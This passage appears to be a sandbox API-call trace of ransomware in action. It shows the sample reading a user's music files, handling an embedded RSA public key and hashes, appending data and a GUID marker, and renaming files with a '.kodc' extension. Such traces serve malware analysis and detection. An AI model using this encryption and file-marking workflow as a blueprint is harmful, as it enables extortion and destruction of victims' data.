RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9d70) returned 0x9ba8d90 [0101.895] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0101.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0101.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0101.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0101.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb6508 [0101.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb81a8 [0101.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb6550 [0101.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb81c0 [0101.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb81f0 [0101.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0101.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8208 [0101.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0101.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0101.896] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0101.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0101.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb81f0 | out: hHeap=0x630000) returned 1 [0101.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8208 | out: hHeap=0x630000) returned 1 [0101.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0101.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0101.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0101.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0101.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb8208 [0101.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0101.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb81f0 [0101.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0101.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0101.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0101.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0101.897] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0101.897] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0101.897] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0101.897] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0101.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0101.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8208 | out: hHeap=0x630000) returned 1 [0101.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb81f0 | out: hHeap=0x630000) returned 1 [0101.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0101.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0101.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0101.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0101.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0101.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.897] GetCurrentThreadId () returned 0x42c [0101.897] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0101.897] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba8b78 [0101.898] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x9d66, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.898] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0101.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0101.898] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0101.898] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0101.898] CloseHandle (hObject=0x5cc) returned 1 [0101.905] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\4q5bCCZXK.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzirrpidroa4g1gj\\4q5bcczxk.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\4q5bCCZXK.m4a.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzirrpidroa4g1gj\\4q5bcczxk.m4a.kodc")) returned 1 [0101.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0101.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.906] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.907] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b2de0 | out: hHeap=0x630000) returned 1 [0101.907] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa63d4310, ftCreationTime.dwHighDateTime=0x1d5b843, ftLastAccessTime.dwLowDateTime=0xd4f87b30, ftLastAccessTime.dwHighDateTime=0x1d5ba72, ftLastWriteTime.dwLowDateTime=0xd4f87b30, ftLastWriteTime.dwHighDateTime=0x1d5ba72, nFileSizeHigh=0x0, nFileSizeLow=0x5e32, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7d54.wav", cAlternateFileName="")) returned 1 [0101.907] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\7d54.wav") returned=".wav" [0101.907] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\7d54.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzirrpidroa4g1gj\\7d54.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0101.908] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=24114) returned 1 [0101.908] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0101.911] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5e0c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.911] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0101.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.912] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.913] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x5e32, lpOverlapped=0x0) returned 1 [0101.913] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0101.913] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.913] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.913] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693158) returned 1 [0101.914] CryptCreateHash (in: hProv=0x693158, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0101.914] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0101.914] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0101.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0101.914] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0101.914] GetLastError () returned 0x0 [0101.914] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0101.915] CryptReleaseContext (hProv=0x693158, dwFlags=0x0) returned 1 [0101.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.915] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0101.915] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0101.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.915] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0101.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x5e30) returned 0x9ba8d90 [0101.915] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0101.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0101.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0101.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0101.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb6550 [0101.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb81c0 [0101.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb6598 [0101.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb81d8 [0101.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8208 [0101.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0101.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8220 [0101.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0101.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0101.916] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0101.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0101.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8208 | out: hHeap=0x630000) returned 1 [0101.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8220 | out: hHeap=0x630000) returned 1 [0101.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0101.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0101.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0101.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0101.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb8220 [0101.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0101.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb8208 [0101.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0101.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0101.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0101.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0101.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0101.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0101.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0101.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0101.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0101.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8220 | out: hHeap=0x630000) returned 1 [0101.917] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.917] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8208 | out: hHeap=0x630000) returned 1 [0101.917] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0101.917] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0101.917] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0101.917] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0101.917] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0101.917] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.917] GetCurrentThreadId () returned 0x42c [0101.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0101.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba8c08 [0101.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0101.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0101.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0101.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0101.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0101.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0101.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.917] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.917] GetCurrentThreadId () returned 0x42c [0101.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.917] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0101.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.917] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0101.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0101.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0101.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0101.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0101.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0101.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0101.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0101.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0101.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0101.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0101.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0101.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8208 [0101.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0101.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0101.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0101.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0101.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0101.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8220 [0101.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0101.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0101.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0101.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb81f0 [0101.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0101.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0101.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0101.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0101.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0101.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0101.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb8238 [0101.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0101.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a40 [0101.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0101.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0101.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0101.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0101.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0101.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0101.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8208 | out: hHeap=0x630000) returned 1 [0101.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8208 [0101.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0101.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0101.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0101.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0101.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0101.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0101.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0101.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c658 [0101.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0101.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0101.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, 